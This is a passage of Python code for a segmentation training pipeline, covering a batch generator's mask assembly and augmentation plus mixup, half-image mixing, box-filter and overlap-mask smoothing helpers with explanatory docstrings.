            X[i,] = self.__load_img(ID)
        return X

    def __generate_Y(self, list_IDs_batch):
        """Assemble the mask tensor for one batch from the in-memory mask store."""
        Y = np.empty((self.batch_size, *self.target_size, self.n_classes), dtype=int)
        for i, ID in enumerate(list_IDs_batch):
            img_name = self.dataframe['image'].loc[ID]
            Y[i, ] = self.masks[self.imageName_to_maskIdx_dict[img_name]]
        return Y

    def __augment_batch(self, X_batch, Y_batch):
        # Apply an independent random transform to every sample in the batch.
        for i in range(X_batch.shape[0]):
            X_batch[i, ], Y_batch[i, ] = self.__random_transform(X_batch[i, ], Y_batch[i, ])
        return X_batch, Y_batch

    def __random_transform(self, X, Y):
        # Apply the same augmentation jointly to image and mask.
        composed = self.augmentation(image=X, mask=Y)
        return composed['image'], composed['mask']
def mixup(imgs, masks, alpha):
    """Batch-level mixup augmentation.

    Each sample i is blended with a random partner j with a per-sample rate
    drawn from Beta(alpha, alpha):  out[i] = rate*x[i] + (1-rate)*x[j].

    Bug fix: the original drew a *separate* random permutation inside the
    helper for images and again for masks, so an image could be blended with
    one partner while its mask was blended with a different one. The
    permutation (and the per-sample rates) is now drawn once and shared, so
    images and masks stay aligned.

    Args:
        imgs: array, shape (B, ...) -- batch of images.
        masks: array, shape (B, ...) -- batch of masks, same batch size.
        alpha: Beta-distribution concentration parameter.

    Returns:
        (mixed_imgs, mixed_masks), same shapes as the inputs.
    """
    mixup_rate = np.random.beta(alpha, alpha, len(imgs))
    mixup_idx = np.random.permutation(np.arange(len(imgs)))

    def __mix(rate, x):
        # Reshape rate to (B, 1, 1, ...) so it broadcasts over sample dims.
        re_rate = rate.reshape((len(x),) + (1,) * (x.ndim - 1))
        return re_rate * x + (1.0 - re_rate) * x[mixup_idx]

    return __mix(mixup_rate, imgs), __mix(mixup_rate, masks)
def mixhalf(imgs, masks, p):
    """With probability ``p`` per sample, rebuild the sample as the
    concatenation of its own left half with the left half of a randomly
    chosen partner sample (same partner for image and mask).

    Args:
        imgs: shape = (B, H, W, Channel)
        masks: shape = (B, H, W, Class)

    Returns:
        (mixed_imgs, mixed_masks) -- copies; the inputs are not modified.

    NOTE(review): both slices take the *left* half (``:dev_w``); if the
    intent was "my left half + partner's right half" the second slice
    should be ``dev_w:`` -- confirm with the author.
    """
    half_w = int(imgs.shape[2] * 0.5)
    partner = np.random.permutation(np.arange(len(imgs)))
    out_imgs = imgs.copy()
    out_masks = masks.copy()
    for idx in range(len(imgs)):
        if np.random.rand() >= p:
            continue
        out_imgs[idx] = np.concatenate(
            [imgs[idx, :, :half_w, :], imgs[partner[idx], :, :half_w, :]], axis=1)
        out_masks[idx] = np.concatenate(
            [masks[idx, :, :half_w, :], masks[partner[idx], :, :half_w, :]], axis=1)
    return out_imgs, out_masks
def average_filter(imgs, kernel_size):
    """Apply a ``kernel_size`` x ``kernel_size`` box (mean) filter to every
    image in the batch.

    Args:
        imgs: batch of images, shape (B, H, W, C).
        kernel_size: side length of the square averaging kernel.

    Returns:
        float32 array of the same shape; the inputs are not modified.
    """
    out = np.zeros_like(imgs, dtype='float32')
    ksize = (kernel_size, kernel_size)
    for idx, image in enumerate(imgs):
        out[idx] = cv2.blur(image.astype('float32'), ksize)
    return out
def smooth_overlap_mask_v1(masks, base_value):
    """Soften mask pixels where several classes overlap.

    Each active pixel keeps ``base_value`` of its weight and scales the
    remainder by its share of the per-pixel class total, so pixels claimed by
    several classes are damped while single-class pixels stay near full value.

    Args:
        masks: array whose last axis indexes classes.
        base_value: fraction of the original mask value always retained.

    Returns:
        Smoothed mask array, same shape as ``masks``.
    """
    class_total = np.sum(masks, axis=-1, keepdims=True)
    share = masks / (class_total + 1e-5)  # epsilon keeps empty pixels finite
    return base_value * masks + (1 - base_value) * masks * share
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.